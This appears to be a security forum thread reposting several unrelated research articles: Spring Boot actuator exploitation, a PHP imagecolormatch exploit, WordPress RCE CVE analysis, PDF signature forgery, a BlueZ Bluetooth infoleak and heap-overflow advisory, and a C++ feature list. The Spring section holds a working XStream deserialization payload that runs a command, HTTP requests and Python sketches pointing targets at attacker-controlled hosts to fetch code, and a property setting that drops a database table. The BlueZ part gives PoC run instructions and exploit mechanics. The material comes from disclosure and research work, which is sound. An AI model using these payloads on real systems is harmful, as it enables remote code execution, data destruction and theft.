3. When this file is parsed on the vulnerable server, it creates a connection to the attacker-controlled LDAP server specified in the "env-entry-name" parameter value, which leads to JNDI resolution. The malicious LDAP server may return an object with 'Reference' type to trigger execution of the supplied bytecode on the target application.
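The trigger URL above can be assembled programmatically. A minimal sketch (the attacker host and config URL are placeholders); note that in Jolokia's URL syntax, '/' inside an argument is escaped as '!/':

```python
# Hedged sketch: build the Jolokia reloadByURL trigger URL described
# above. Target and attacker hosts are hypothetical placeholders.
def jolokia_reload_url(target, attacker_config_url):
    escaped = attacker_config_url.replace("/", "!/")  # Jolokia path escaping
    return (target + "/jolokia/exec/"
            "ch.qos.logback.classic:Name=default,"
            "Type=ch.qos.logback.classic.jmx.JMXConfigurator/"
            "reloadByURL/" + escaped)

url = jolokia_reload_url("http://127.0.0.1:8090",
                         "http://attacker.example/logback.xml")
print(url)
# Triggering it is then a plain GET, e.g.:
#   import urllib.request; urllib.request.urlopen(url)
```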
JNDI attacks are well explained in this MicroFocus research paper. The new JNDI exploitation technique (described previously in our blog) also works here, as Tomcat is the default application server in the Spring Boot Framework.

2. Config modification via '/env'
If Spring Cloud libraries are in the classpath, the '/env' endpoint allows you to modify the Spring environmental properties. All beans annotated as '@ConfigurationProperties' may be modified and rebound. Many, but not all, of the properties we can control are listed on the '/configprops' actuator endpoint. Actually, there are tons of them, but it is absolutely not clear what we need to modify to achieve something. After spending a couple of days playing with them, we found this:

POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream

This property modifies the Eureka serviceURL to an arbitrary value. Eureka Server is normally used as a discovery server, and almost all Spring Cloud applications register with it and send status updates to it. If you are lucky enough to have Eureka-Client <1.8.7 in the target classpath (it is normally included in Spring Cloud Netflix), you can exploit the XStream deserialization vulnerability in it. All you need to do is set the 'eureka.client.serviceUrl.defaultZone' property to your server URL (http://artsploit.com/n/xstream) via '/env' and then call the '/refresh' endpoint.
After that, your server should serve the XStream payload with the following content:

<linked-hash-set>
  <jdk.nashorn.internal.objects.NativeString>
    <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
      <dataHandler>
        <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
          <is class="javax.crypto.CipherInputStream">
            <cipher class="javax.crypto.NullCipher">
              <serviceIterator class="javax.imageio.spi.FilterIterator">
                <iter class="javax.imageio.spi.FilterIterator">
                  <iter class="java.util.Collections$EmptyIterator"/>
                  <next class="java.lang.ProcessBuilder">
                    <command>
                      <string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>
                    </command>
                    <redirectErrorStream>false</redirectErrorStream>
                  </next>
                </iter>
                <filter class="javax.imageio.ImageIO$ContainsFilter">
                  <method>
                    <class>java.lang.ProcessBuilder</class>
                    <name>start</name>
                    <parameter-types/>
                  </method>
                  <name>foo</name>
                </filter>
                <next class="string">foo</next>
              </serviceIterator>
              <lock/>
            </cipher>
            <input class="java.lang.ProcessBuilder$NullInputStream"/>
            <ibuffer></ibuffer>
          </is>
        </dataSource>
      </dataHandler>
    </value>
  </jdk.nashorn.internal.objects.NativeString>
</linked-hash-set>

This XStream payload is a slightly modified version of the ImageIO JDK-only gadget chain from the Marshalsec research. The only difference here is using LinkedHashSet to trigger the 'jdk.nashorn.internal.objects.NativeString.hashCode()' method. The original payload leverages java.lang.Map to achieve the same behaviour, but Eureka's XStream configuration has a custom converter for maps which makes it unusable. The payload above does not use Maps at all and can be used to achieve Remote Code Execution without additional constraints.

Using Spring actuators, you can actually exploit this vulnerability even if you don't have access to an internal Eureka server; you only need an '/env' endpoint available.
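The two requests described above ('/env' then '/refresh') can be sketched as follows for Spring Boot 1.x (form encoding; host and attacker URL are placeholders):

```python
# Hedged sketch of the /env + /refresh request pair (Spring Boot 1.x).
# Host and payload URL are hypothetical placeholders.
from urllib.parse import urlencode

target = "http://127.0.0.1:8090"
payload_url = "http://attacker.example/n/xstream"

# Step 1: point the Eureka serviceUrl at the attacker's server.
env_body = urlencode({"eureka.client.serviceUrl.defaultZone": payload_url})
print("POST", target + "/env")
print("Content-Type: application/x-www-form-urlencoded")
print(env_body)

# Step 2: trigger /refresh so the client fetches (and XStream-
# deserializes) the attacker's payload.
print("POST", target + "/refresh")  # empty body

# To actually send them:
#   import urllib.request
#   req = urllib.request.Request(target + "/env",
#                                data=env_body.encode(), method="POST")
#   urllib.request.urlopen(req)
```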
Other useful settings:

spring.datasource.tomcat.validationQuery=drop+table+users - allows you to specify any SQL query, and it will be automatically executed against the current database. It could be any statement, including insert, update, or delete.

spring.datasource.tomcat.url=jdbc:hsqldb:https://localhost:3002/xdb - allows you to modify the current JDBC connection string.

The last one looks great, but the problem is that when the application is running, the database connection is already established, so just updating the JDBC string does not have any effect. Fortunately, there is another property that may help us in this case:

spring.datasource.tomcat.max-active=777

The trick we can use here is to increase the number of simultaneous connections to the database. So, we can change the JDBC connection string, increase the number of connections, and after that send many requests to the application to simulate heavy load. Under load, the application will create a new database connection with the updated malicious JDBC string. I tested this technique locally against MySQL and it works like a charm.

Apart from that, there are other properties that look interesting but, in practice, are not really useful:

spring.datasource.url - database connection string (used only for the first connection)
spring.datasource.jndiName - database JNDI string (used only for the first connection)
spring.datasource.tomcat.dataSourceJNDI - database JNDI string (not used at all)
spring.cloud.config.uri=http://artsploit.com/ - Spring Cloud config URL (does not have any effect after app start; only the initial values are used)

These properties do not have any effect unless the '/restart' endpoint is called. This endpoint restarts the ApplicationContext, but it's disabled by default. There are a lot of other interesting properties, but most of them do not take immediate effect after a change.

N.B.
In Spring Boot 2.x, the request format for modifying properties via the '/env' endpoint is slightly different (it uses JSON instead), but the idea is the same.

An example of a vulnerable app:
If you want to test this vulnerability locally, I created a simple Spring Boot application on my GitHub page. All payloads should work there, except for the database settings (unless you configure them).

Black box discovery:
A full list of default actuators may be found here: https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt. Keep in mind that application developers can create their own endpoints using the @Endpoint annotation.

Sursa: https://www.veracode.com/blog/research/exploiting-spring-boot-actuators
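For illustration, the Spring Boot 2.x variant mentioned above can be sketched like this; the '/actuator/env' path and the JSON "name"/"value" body follow Spring Boot 2's actuator conventions, and the host and payload URL are placeholders:

```python
# Hedged sketch: Spring Boot 2.x writable env endpoint takes JSON.
# Host and payload URL are hypothetical placeholders.
import json

body = json.dumps({
    "name": "eureka.client.serviceUrl.defaultZone",
    "value": "http://attacker.example/n/xstream",
})
print("POST http://127.0.0.1:8090/actuator/env")
print("Content-Type: application/json")
print(body)
```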
  6. imagecolormatch() OOB Heap Write exploit

Info
My binary exploit for CVE-2019-6977. Bug found by Simon Scannell from RIPS. The PHP bug report is here. Helps you bypass PHP's disable_functions INI directive. I commented a lot to help people who are new to binary PHP exploitation. Hope this helps.

Output
GET http://target.com/exploit.php?f=0x7fe83d1bb480&c=id+>+/dev/shm/titi
Nenuphar.ce: 0x7fe834a10018
Nenuphar2.ce: 0x7fe834a10d70
Nenuphar.properties: 0x7fe834a01230
z.val: 0x7fe834aaea18
Difference: 0xad7e8
Exploit SUCCESSFUL !

Sursa: https://github.com/cfreal/exploits/tree/master/CVE-2019-6977-imagecolormatch
  7. Analyzing WordPress Remote Code Execution Vulnerabilities CVE-2019-8942 and CVE-2019-8943
Posted on: February 26, 2019 at 7:24 am
Posted in: Exploits, Vulnerabilities
by Suraj Sahu and Jayesh Patel (Vulnerability Researchers, Trend Micro)

As an open-source, feature-rich, and user-friendly content management system (CMS), WordPress powers nearly 33 percent of today's websites. This popularity is also what makes it an obvious cybercriminal target. All it could take is one vulnerability for an attacker to gain a foothold into a website's sensitive data. This can be compounded by security issues brought about by outdated installations or the use of insecure third-party plugins or components.

On February 19, 2019, Simon Scannell of RIPS Technologies published his findings on core vulnerabilities in WordPress that can lead to remote code execution (RCE). These have been assigned CVE-2019-8942 and CVE-2019-8943. In a nutshell, these security flaws, when successfully exploited, could enable attackers with at least author privileges to execute hypertext preprocessor (PHP) code and gain full system control. Affected versions of WordPress include versions 5 (prior to 5.0.1) and 4 (prior to 4.9.9). The vulnerabilities have also been disclosed to WordPress' security team.

This blog post expounds on the technical details of the vulnerabilities: specifically, what a potential attack could look like and the parameters that are added to take advantage of a vulnerable WordPress site.

Vulnerability analysis and attack chain
An attacker with author privileges can upload PHP code embedded in an image file to a WordPress site. The uploaded file gets saved in the wp-content/uploads folder; an entry for this file is also saved in the database's postmeta table.

Figure 1. Screenshot showing how CVE-2019-8942 could be exploited

By exploiting CVE-2019-8942, an attacker can modify the _wp_attached_file meta_key (used to retrieve a value saved from the database and display it) to an arbitrary value. Exploiting the vulnerability requires sending a crafted post-edit request. A benign request typically would not have a file parameter in the request; an attacker-crafted request can include a file parameter that allows hackers to update the _wp_attached_file meta_key. As shown in Figure 3, the same can also be observed in the database table.

Figure 2. Screenshot showing how an especially crafted PHP file is embedded (highlighted)
Figure 3. Screenshot showing a modified file name in the database (highlighted)

Unpatched versions of WordPress (before 4.9.9 and 5.0.1) do not have checks to validate which metadata fields are going to get updated through a request. Attackers can take advantage of this to update or alter the _wp_attached_file meta_key value to an arbitrary one. In the patched versions, the new function _wp_get_allowed_postdata() in admin/includes/post.php was added to check whether "file", "meta_input", or "guid" are sent in the edit request; if so, they are removed before the post is updated.

Figure 3 shows that exploiting CVE-2019-8942 lets hackers modify the file name in the database into something akin to a path traversal (e.g., evil1.jpg?../../evil1.jpg). An attacker can chain the exploit of CVE-2019-8942 with another, this time exploiting CVE-2019-8943. The latter lets attackers move the uploaded file to an arbitrary directory, where the embedded PHP code can get executed successfully.

Figure 4 shows what CVE-2019-8943 entails: the wp_crop_image function (which lets WordPress users crop images to a given size or resolution) in wp-admin/includes/image.php doesn't validate the destination (dst) file path before saving the file.

Figure 4. Screenshot showing the wp_crop_image function not validating the dst file path
Figure 5. How the wp_crop_image function tries to access the file locally

In a possible attack scenario, once the file name in the meta_key is modified, the file (e.g., evil1.jpg?../../evil1.jpg in Figure 3) will not be found in the upload directory. Hence, execution falls through to the next if condition in the wp_crop_image function, where it tries to access the file by URL. (This step requires a file replication plugin to be installed on the WordPress site.) The request will look something like this:

hxxps[:]//vulnerablewebsite/wp-content/uploads/evil1.jpg?../../evil1.jpg

While loading the image, the path after "?" is ignored and the image loads successfully. The attacker then crops the image; when it is saved, the path traversal is followed and the file is saved in an arbitrary directory.

Caveats and best practices
Patching CVE-2019-8942 makes CVE-2019-8943 non-exploitable, as the former plays an essential part in successfully exploiting the latter. That's because the meta_key in _wp_attached_file first needs to be updated or modified to a path traversal file name before embedded PHP code can be executed. More importantly, these vulnerabilities highlight the importance for developers to practice security by design, and for administrators to adopt security hygiene to reduce their website's attack surface:

Regularly update the CMS, or employ virtual patching to address vulnerabilities for which patches are not yet available and on systems that need to be constantly up and running.
Consistently vet the website and its infrastructure or components against exploitable vulnerabilities.
Enforce the principle of least privilege, and disable or delete outdated or vulnerable plugins.
The Trend Micro Deep Security™ solution protects user systems from threats that might exploit CVE-2019-8942 and CVE-2019-8943 via the following deep packet inspection (DPI) rules:
1005933 – Identified Directory Traversal Sequence In Uri Query
1009544 – WordPress Image Remote Code Execution Vulnerability (CVE-2019-8942)

Trend Micro™ TippingPoint™ customers are protected from these vulnerabilities via these MainlineDV filters:
34573 – HTTP: WordPress 5.0.0 File Inclusion Vulnerability
34578 – HTTP: WordPress Image Remote Code Execution Vulnerability

Sursa: https://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-wordpress-remote-code-execution-vulnerabilities-cve-2019-8942-and-cve-2019-8943/
  8. C++17/14/11
Overview
Many of these descriptions and examples come from various resources (see the Acknowledgements section), summarized in my own words. Also, there are now dedicated readme pages for each major C++ version.

C++17 includes the following new language features:
template argument deduction for class templates
declaring non-type template parameters with auto
folding expressions
new rules for auto deduction from braced-init-list
constexpr lambda
lambda capture this by value
inline variables
nested namespaces
structured bindings
selection statements with initializer
constexpr if
utf-8 character literals
direct-list-initialization of enums

C++17 includes the following new library features:
std::variant
std::optional
std::any
std::string_view
std::invoke
std::apply
std::filesystem
std::byte
splicing for maps and sets
parallel algorithms

C++14 includes the following new language features:
binary literals
generic lambda expressions
lambda capture initializers
return type deduction
decltype(auto)
relaxing constraints on constexpr functions
variable templates

C++14 includes the following new library features:
user-defined literals for standard library types
compile-time integer sequences
std::make_unique

C++11 includes the following new language features:
move semantics
variadic templates
rvalue references
forwarding references
initializer lists
static assertions
auto
lambda expressions
decltype
template aliases
nullptr
strongly-typed enums
attributes
constexpr
delegating constructors
user-defined literals
explicit virtual overrides
final specifier
default functions
deleted functions
range-based for loops
special member functions for move semantics
converting constructors
explicit conversion functions
inline-namespaces
non-static data member initializers
right angle brackets

C++11 includes the following new library features:
std::move
std::forward
std::thread
std::to_string
type traits
smart pointers
std::chrono
tuples
std::tie
std::array
unordered containers
std::make_shared
memory model
std::async

Sursa: https://github.com/AnthonyCalandra/modern-cpp-features
  9. How to break PDF Signatures

If you open a PDF document and your viewer displays a panel (like the one below) indicating that the document is signed by invoicing@amazon.de and the document has not been modified since the signature was applied, you assume that the displayed content is precisely what invoicing@amazon.de created. During recent research, we found out that this is not the case for almost all PDF desktop viewers and most online validation services.

So what is the problem?
With our attacks, we can use an existing signed document (e.g., an amazon.de invoice) and change the content of the document arbitrarily without invalidating the signatures. Thus, we can forge a document signed by invoicing@amazon.de to refund us one trillion dollars. To detect the attack, you would need to be able to read and understand the PDF format in depth. Most people are probably not capable of such a thing (PDF file example). To recap: you can use any signed PDF document and create a document which contains arbitrary content in the name of the signing user, company, ministry, or state.

Important: To verify the signature, you need to trust the amazon.de certificate, which you would if you get signed PDFs from Amazon; otherwise the signature is still valid, but the certificate is not trusted. Furthermore, due to our responsible disclosure process, most applications have already implemented countermeasures against our attack; you can find a vulnerable Adobe Acrobat DC Reader version here.

Who uses PDF Signatures?
Since 2014, organizations delivering public digital services in an EU member state are required by law (eIDAS) to support digitally signed documents such as PDF files. In Austria, every governmental authority digitally signs any document (§19). Also, any new law is legally valid after its announcement within a digitally signed PDF. Several countries like Brazil, Canada, the Russian Federation, and Japan also use and accept digitally signed documents.
The US government protects PDF files with PDF signatures, and individuals can report tax withholdings by signing and submitting a PDF. Outside Europe, Forbes ranks the electronic signature and digital transactions company DocuSign No. 4 in its Cloud 100 list. Many companies sign every document they deliver (e.g., Amazon, Decathlon, Sixt). Standardization documents, such as ISO and DIN, are also protected by PDF signatures. Even in the academic world, PDF signatures are sometimes used to sign scientific papers (e.g., ESORICS proceedings). According to Adobe Sign, the company processed 8 billion electronic and digital signatures in 2017 alone. Currently, we are not aware of any exploits using our attacks.

How bad is it?
We evaluated our attacks against two types of applications: the commonly known desktop applications everyone uses on a daily basis, and online validation services. The latter are often used in the business world to validate the signature of a PDF document, returning a validation report as a result. During our research, we identified 21 out of 22 desktop viewer applications and 5 out of 7 online validation services as vulnerable to at least one of our attacks. You can find the detailed results of our evaluation on the following web pages:
Desktop Viewer Applications
Online Validation Services

How can I protect myself?
As part of our research, we started a responsible disclosure procedure on 9 October 2018, after we identified 21 out of 22 desktop viewer applications and 5 out of 7 online validation services as vulnerable to at least one of our attacks. In cooperation with the BSI-CERT, we contacted all vendors, provided proof-of-concept exploits, and helped them fix the issues. You can take a look at which PDF Reader you are using and compare the versions. If you use one of our analyzed desktop viewer applications, you should already have received an update for your Reader.
My PDF Reader is not listed
If you use another Reader, you should contact the support team for your application.

Sursa: https://www.pdf-insecurity.org/
  10. SSD Advisory – Linux BlueZ Information Leak and Heap Overflow
February 25, 2019

(This advisory follows up on a presentation provided during our offensive security event in 2018 in Hong Kong – come join us at TyphoonCon – June 2019 in Seoul for more offensive security lectures and training)

Vulnerabilities Summary
The following advisory discusses two vulnerabilities found in the Linux BlueZ Bluetooth module. One of the core ideas behind Bluetooth is allowing interoperability between a wide range of devices from different manufacturers. This is one of the reasons that the Bluetooth specification is extremely long and complex. Detailed descriptions of a wide range of protocols that support all common use cases ensure that different Bluetooth implementations can work together. However, from an attacker's point of view this also means that there is a lot of unneeded complexity in the Bluetooth stack, which provides a large attack surface. Due to the modular nature of Bluetooth, some critical features such as packet fragmentation are found redundantly in multiple protocols that are part of the Bluetooth core specification. This makes correct implementation very complicated and increases the likelihood of security issues.

Vendor Response
We contacted the BlueZ maintainer on 23/8/2018 and sent a report describing the two vulnerabilities. The vendor responded: "I got the message and was able to decrypt it, but frankly I don't know when I get to look at it at confirm the issue." We have sent a few more emails to the vendor since the first report and also proposed patches for the vulnerabilities, but no fix has been issued as of the day of writing this post. Proposed patches, provided by Luiz Augusto von Dentz, appear at the bottom of this advisory.

CVE
CVE-2019-8921
CVE-2019-8922

Credit
An independent security researcher, Julian Rauchberger, reported these vulnerabilities to SSD Secure Disclosure program.
Affected systems
Linux systems with the BlueZ module, versions 5.17–5.48 (latest at the time of writing this advisory)

Vulnerability Details
To support the huge range of potential use cases for Bluetooth, the specification describes many different protocols. For the vulnerabilities detailed in this advisory, we will focus on two core protocols: L2CAP and SDP.

L2CAP
Simply speaking, L2CAP can be seen as the TCP layer of Bluetooth. It is responsible for implementing low-level features such as multiplexing and flow control. What would be called a "port" in TCP is the "Protocol/Service Multiplexer" (PSM) value in L2CAP. Authentication and authorization are generally handled on higher layers, meaning that an attacker can open an L2CAP connection to any PSM they want and send whatever crafted packets they wish. From a technical point of view, BlueZ implements L2CAP inside the kernel as a module.

SDP
SDP is the Service Discovery Protocol. It is implemented above L2CAP as a "service" running on PSM 0x0001. Since the PSM is only a 16-bit number, it is not possible to assign a unique PSM to every Bluetooth service imaginable. SDP can translate globally unique UUIDs to a dynamic PSM used on a specific device. For instance, a vendor-specific service has the same UUID on all devices but might run on PSM 0x0123 on device A and PSM 0x0456 on device B. It is the job of SDP to provide this information to devices that wish to connect to the service.

Example
* Device A opens an L2CAP connection to PSM 0x0001 (SDP) on device B
* Device A asks "what is the PSM for the service with UUID 0x12345678?"
* Device B responds with "PSM 0x1337"
* Device A opens an L2CAP connection to PSM 0x1337

SDP is also used to advertise all the Bluetooth profiles (services/features) a device supports. It can be queried to send a list of all services running on the device as well as their attributes (mostly simple key/value pairs). The SDP protocol is implemented in a userspace daemon by BlueZ.
Since it requires high privileges, this daemon normally runs as root, meaning vulnerabilities should result in full system compromise in most cases.

PoCs and Testing Environment
The PoCs attached at the end of this advisory have been tested against BlueZ 5.48 (the newest version at the time of writing), BlueZ 5.17 (a very old version from 2014), as well as a few in between. The PoCs have been written for Python 2.7 and have two dependencies; please install them first:
* pybluez (to send Bluetooth packets)
* pwntools (for easier crafting of packets and hexdump())

Run them with:
python sdp_infoleak_poc.py TARGET=XX:XX:XX:XX:XX:XX
python sdp_heapoverflow_poc.py TARGET=XX:XX:XX:XX:XX:XX
(where XX:XX:XX:XX:XX:XX is the Bluetooth MAC address of the victim device)

Please ensure that Bluetooth is activated and the device is discoverable (called "visible" in most of the GUIs). It might be necessary to update the SERVICE_REC_HANDLE and/or SERVICE_ATTR_ID to get the PoCs to work. These values can differ between devices. They are advertised by SDP, so finding them could be automated, but we didn't implement that. Detailed information is inside the comments of the PoCs.

Vulnerability 1: SDP infoleak
Note: All line numbers and filenames referenced here were taken from BlueZ 5.48, which is the newest version at the time of writing.

The vulnerability lies in the handling of an SVC_ATTR_REQ by the SDP implementation of BlueZ. By crafting a malicious CSTATE, it is possible to trick the server into returning more bytes than the buffer actually holds, resulting in leaking arbitrary heap data.

Background
This vulnerability demonstrates very well the issues arising due to the aforementioned complexity caused by the redundant implementation of some features in multiple protocols. Even though L2CAP already provides sufficient fragmentation features, SDP defines its own. However, incorrect implementation in BlueZ leads to a significant information leak.
One of the features of SDP is to provide the values of custom attributes a service might have. The client sends the ID of an attribute and SDP responds with the corresponding value. If the response to an attribute request is too large to fit within a single SDP packet, a "Continuation State" (cstate) is created.

Here is how it should work in theory:
* The client sends an attribute request.
* The server sees that the response is too large to fit in the reply.
* The server appends arbitrary continuation state data to the response.
* The client recognizes this means the response is not complete yet.
* The client sends the same request again, this time including the continuation state data sent by the server.
* The server responds with the rest of the data.

According to the specification, the cstate data can be arbitrary data, basically whatever the specific implementation wants, and the client is required to send the same request again, including the cstate data sent by the server. The implementation of this mechanism in BlueZ is flawed. A malicious client can manipulate the cstate data it sends in the second request. The server does not check this and simply trusts that the data is the same. This leads to an infoleak described in the next section.
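A rough sketch of what the second, malicious request could look like on the wire follows. The outer PDU layout follows the Bluetooth SDP specification; the cstate body (timestamp plus maxBytesSent) follows this advisory's description of BlueZ's sdp_cont_state_t and is an assumption, as are the record handle and attribute ID values:

```python
# Hedged sketch of an SDP ServiceAttributeRequest PDU with an
# attacker-chosen continuation state. Handle/ID values and the cstate
# byte layout are assumptions for illustration.
import struct

def svc_attr_req(tid, rec_handle, max_rsp_size, attr_id, cstate=b""):
    # Attribute ID list: a Data Element Sequence holding one 16-bit ID
    # (0x35 = sequence with 8-bit length, 0x09 = 16-bit unsigned int).
    attr_list = struct.pack(">BBBH", 0x35, 0x03, 0x09, attr_id)
    params = (struct.pack(">IH", rec_handle, max_rsp_size)
              + attr_list
              + struct.pack(">B", len(cstate)) + cstate)
    # PDU header: ID 0x04 = SDP_SVC_ATTR_REQ, transaction ID, length.
    return struct.pack(">BHH", 0x04, tid, len(params)) + params

# Replayed request with a cstate whose maxBytesSent exceeds data_size,
# triggering the underflow analyzed in the next section.
evil_cstate = struct.pack("<IH", 0, 0xFFFF)  # timestamp, maxBytesSent
pdu = svc_attr_req(tid=1, rec_handle=0x10000, max_rsp_size=0x7FFF,
                   attr_id=0x0100, cstate=evil_cstate)
print(pdu.hex())
```

The actual PoC sends this over an L2CAP socket to PSM 0x0001 (via pybluez); only the PDU construction is sketched here.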
Root cause analysis
The root cause can be found in the function service_attr_req, starting at line 633 of src/sdpd-request.c:

721 if (cstate) {
722     sdp_buf_t *pCache = sdp_get_cached_rsp(cstate);
723
724     SDPDBG("Obtained cached rsp : %p", pCache);
725
726     if (pCache) {
727         short sent = MIN(max_rsp_size, pCache->data_size - cstate->cStateValue.maxBytesSent);
728         pResponse = pCache->data;
729         memcpy(buf->data, pResponse + cstate->cStateValue.maxBytesSent, sent);
730         buf->data_size += sent;
731         cstate->cStateValue.maxBytesSent += sent;
732
733         SDPDBG("Response size : %d sending now : %d bytes sent so far : %d",
734                 pCache->data_size, sent, cstate->cStateValue.maxBytesSent);
735         if (cstate->cStateValue.maxBytesSent == pCache->data_size)
736             cstate_size = sdp_set_cstate_pdu(buf, NULL);
737         else
738             cstate_size = sdp_set_cstate_pdu(buf, cstate);
739     } else {
740         status = SDP_INVALID_CSTATE;
741         error("NULL cache buffer and non-NULL continuation state");
742     }

The main issue here is in line 727, where BlueZ calculates how many bytes should be sent to the client.
The value of max_rsp_size can be controlled by the attacker, but normally the MIN function should ensure that it cannot be larger than the actual number of bytes available. The vulnerability is that we can cause an underflow when calculating (pCache->data_size - cstate->cStateValue.maxBytesSent), which makes that value extremely high when interpreted as an unsigned integer. MIN will then return whatever we sent as max_rsp_size, since it is smaller than the result of the underflow. pCache->data_size is the size of the initially generated response. cstate->cStateValue.maxBytesSent is read directly from the cstate we sent to the server, so we can set it to any value we want. If we set maxBytesSent to a value higher than data_size, we trigger an underflow that causes MIN() to return our max_rsp_size, which lets us set “sent” to any value we want. The memcpy in line 729 will then copy all that data to the response buffer, which later gets sent to us. Since “sent” is a signed short, we have two possible ways to exploit this:

- If we set sent to a value <= 0x7FFF, it is treated as a positive integer and we will get that many bytes sent back.
- If we set it to 0x8000 or larger, it is treated as a negative value: sign extension fills all the most significant bits with 1, resulting in an extremely large copy operation in line 729 that is guaranteed to crash the program.

So this vulnerability can either be used as an infoleak to leak up to 0x7FFF bytes, or as a Denial of Service that crashes the Bluetooth application.

Triggering the vulnerability

To trigger this vulnerability, we first send a legitimate attribute request to the server. In our request, we can specify how many bytes we are willing to accept within a single response packet. Since we already know how large the response will be, we set this so the response will be one byte too large. This results in the server storing that there is one byte left it hadn’t sent us yet.
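To make the arithmetic concrete, here is a standalone sketch of the calculation in line 727, assuming the subtraction happens on 32-bit unsigned operands before the result is truncated into the signed short (the function name and the example sizes are ours, taken from the 102-byte response used later in the PoC):

```python
import ctypes

def sent_bytes(max_rsp_size, data_size, max_bytes_sent):
    # (pCache->data_size - cstate->cStateValue.maxBytesSent) behaves like an
    # unsigned 32-bit subtraction in C, so it wraps around on underflow:
    remaining = (data_size - max_bytes_sent) & 0xFFFFFFFF
    # MIN(max_rsp_size, remaining) is then truncated into a signed short:
    return ctypes.c_short(min(max_rsp_size, remaining)).value

# Honest continuation: 102-byte cached response, 101 bytes already sent.
assert sent_bytes(0x0FFF, 102, 101) == 1
# Attacker echoes an inflated offset (201 > 102): the subtraction underflows,
# so MIN() returns the attacker-chosen max_rsp_size -> 0x0FFF leaked bytes.
assert sent_bytes(0x0FFF, 102, 201) == 0x0FFF
# max_rsp_size >= 0x8000 truncates to a negative short -> huge memcpy, crash.
assert sent_bytes(0x8000, 102, 201) < 0
```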
The server also sends us a cstate that contains how many bytes it has already sent us. For simplicity, we call this value the “offset”. Then we send the same request again, but we increase the “offset” contained in the cstate to create the underflow described above. For detailed documentation of what exactly the packets we send look like, please refer to the comments in the Python PoC file.

Vulnerability 2: SDP Heap Overflow

Like the information leak, this vulnerability also lies in the SDP handling of attribute requests. By requesting a huge number of attributes at the same time, an attacker can overflow the static buffer provided to hold the response. Normally, it would not be possible to request that many attributes, but we will demonstrate a trick that allows us to do so.

Root cause analysis

In the same function service_attr_req of src/sdpd-request.c, the function extract_attrs is called in line 745:

744     sdp_record_t *rec = sdp_record_find(handle);
745     status = extract_attrs(rec, seq, buf);
746     if (buf->data_size > max_rsp_size) {
747         sdp_cont_state_t newState;
748
749         memset((char *)&newState, 0,

This function is used to find the actual values of all the attributes requested by the client.
Inside it, we find the following code:

606     for (attr = low; attr < high; attr++) {
607         data = sdp_data_get(rec, attr);
608         if (data)
609             sdp_append_to_pdu(buf, data);
610     }
611     data = sdp_data_get(rec, high);
612     if (data)
613         sdp_append_to_pdu(buf, data);

The important part here is that after getting the values of the attributes with sdp_data_get, they are simply appended to the buffer with sdp_append_to_pdu. The code of this function can be found in lib/sdp.c:

2871 void sdp_append_to_pdu(sdp_buf_t *pdu, sdp_data_t *d)
2872 {
2873     sdp_buf_t append;
2874
2875     memset(&append, 0, sizeof(sdp_buf_t));
2876     sdp_gen_buffer(&append, d);
2877     append.data = malloc(append.buf_size);
2878     if (!append.data)
2879         return;
2880
2881     sdp_set_attrid(&append, d->attrId);
2882     sdp_gen_pdu(&append, d);
2883     sdp_append_to_buf(pdu, append.data, append.data_size);
2884     free(append.data);
2885 }

What happens here is that an appropriately sized sdp_buf_t is created and the new data is copied into it. After that, sdp_append_to_buf is called to append this data to the buffer originally passed in by extract_attrs.
sdp_append_to_buf can be found in the same file; the relevant part is here:

2829 void sdp_append_to_buf(sdp_buf_t *dst, uint8_t *data, uint32_t len)
2830 {
2831     uint8_t *p = dst->data;
2832     uint8_t dtd = *p;
2833
2834     SDPDBG("Append src size: %d", len);
2835     SDPDBG("Append dst size: %d", dst->data_size);
2836     SDPDBG("Dst buffer size: %d", dst->buf_size);
2837     if (dst->data_size == 0 && dtd == 0) {
2838         /* create initial sequence */
2839         *p = SDP_SEQ8;
2840         dst->data_size += sizeof(uint8_t);
2841         /* reserve space for sequence size */
2842         dst->data_size += sizeof(uint8_t);
2843     }
2844
2845     memcpy(dst->data + dst->data_size, data, len);

As we can see, there isn’t any check whether there is enough space in the destination buffer; the function simply appends all data passed to it. To sum everything up: the values of all requested attributes are simply appended to the output buffer. There are no size checks whatsoever, resulting in a simple heap overflow if one can craft a request whose response is large enough to overflow the preallocated buffer. service_attr_req gets called by process_request (also in src/sdpd-request.c), which also allocates the response buffer.
968 static void process_request(sdp_req_t *req)
969 {
970     sdp_pdu_hdr_t *reqhdr = (sdp_pdu_hdr_t *)req->buf;
971     sdp_pdu_hdr_t *rsphdr;
972     sdp_buf_t rsp;
973     uint8_t *buf = malloc(USHRT_MAX);
974     int status = SDP_INVALID_SYNTAX;
975
976     memset(buf, 0, USHRT_MAX);
977     rsp.data = buf + sizeof(sdp_pdu_hdr_t);
978     rsp.data_size = 0;
979     rsp.buf_size = USHRT_MAX - sizeof(sdp_pdu_hdr_t);
980     rsphdr = (sdp_pdu_hdr_t *)buf;

On line 973, the response buffer gets allocated with size USHRT_MAX (65535 bytes). So in order to overflow this buffer, we need to generate a response larger than 65535 bytes. While SDP does not restrict how many attributes we can request within a single packet, we are limited by the outgoing maximum transmission unit (MTU) that L2CAP forces us to use. For SDP, this seems to be hardcoded as 672 bytes. So the problem in exploiting this vulnerability is that we can only send a very small request but need to generate a large response. Some attributes are rather long strings, but even by requesting the longest string we found, we could not get close to generating a large enough response. SDP also has a feature that lets us request not just one attribute at a time but a whole range of attributes: this requires us to send only the starting and ending IDs, and SDP will then return all attributes within that range. Unfortunately, the response generated this way wasn’t large enough either.
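A back-of-the-envelope estimate shows why the 672-byte MTU is the bottleneck. The header constants below follow the PoC's packet layout, and RESP_PER_ATTR (roughly 10 response bytes per requested attribute, derived from the 10-attribute/102-byte example in the infoleak PoC) is an assumption rather than an exact BlueZ constant, so treat the numbers as rough:

```python
# Rough capacity estimate; header sizes follow the PoC's packet layout and
# RESP_PER_ATTR is an assumed average, not an exact BlueZ constant.
PDU_HDR = 5          # pdu_id (1) + TID (2) + plen (2)
BODY_OVERHEAD = 10   # handle (4) + max_rsp_size (2) + seq DTD/len (3) + cstate len (1)
ATTR_ENTRY = 3       # one SDP_UINT16 attribute ID entry in the request
RESP_PER_ATTR = 10   # assumed response bytes generated per requested attribute
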